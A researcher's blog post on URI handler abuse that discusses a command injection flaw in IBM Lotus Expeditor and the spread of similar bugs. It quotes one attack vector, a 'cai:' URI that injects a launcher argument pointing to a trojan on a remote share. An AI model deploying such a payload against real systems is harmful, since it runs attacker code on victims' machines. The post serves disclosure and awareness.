More URI handler issues to come
Rob Carter, Billy Rios, and I have been blogging about and speaking at conferences like Black Hat and ToorCon all year on the subject of URI handler abuse. One might think these types of flaws are soon to go away, but one look at SecurityFocus and FullDisclosure today and you can see that's not the case. Specifically, a new command injection flaw was discovered, this time in IBM's Lotus Expeditor. The attack vector is as follows:
cai:"%20-launcher%20\\6.6.6.6\d$\trojan
What's most interesting about this class of vulnerability is that it can be deployed quite simply using Cross-Site Scripting or Cross-Site Request Forgery, making those two web application flaws even more dangerous.
As I mentioned, Carter, Rios, and I have been discussing this a lot this year, and other researchers, like PDP, founder of GNUCitizen have jumped on board as well. In fact, there's been other command injection flaws similar to the Lotus Expeditor flaw mentioned above, most notably in the Firefox browser and in the Microsoft Windows XP operating system. There's also been a whole host of other issues, including stack overflows, format string flaws, null pointer dereference issues, application functionality abuse, etc., which have already been covered in our Black Hat presentations.
The biggest problem with this is that, it isn't going away. Researchers and hackers are becoming more aware of it and finding more issues, but this isn't curbing the appetite of programmers to develop applications with URI handler functionality. In fact, if anything, I'm seeing more and more of these coming out, sometimes for applications that really DON'T need them... I'm also seeing them increasingly on mobile devices.
Carter, Rios, and I have been focusing our efforts on other areas of research, but I expect that there will be a lot more bugs uncovered in this area. It's like developers are all reading the same book that says an application is nothing without a URI handler... it's truly absurd.
-Nate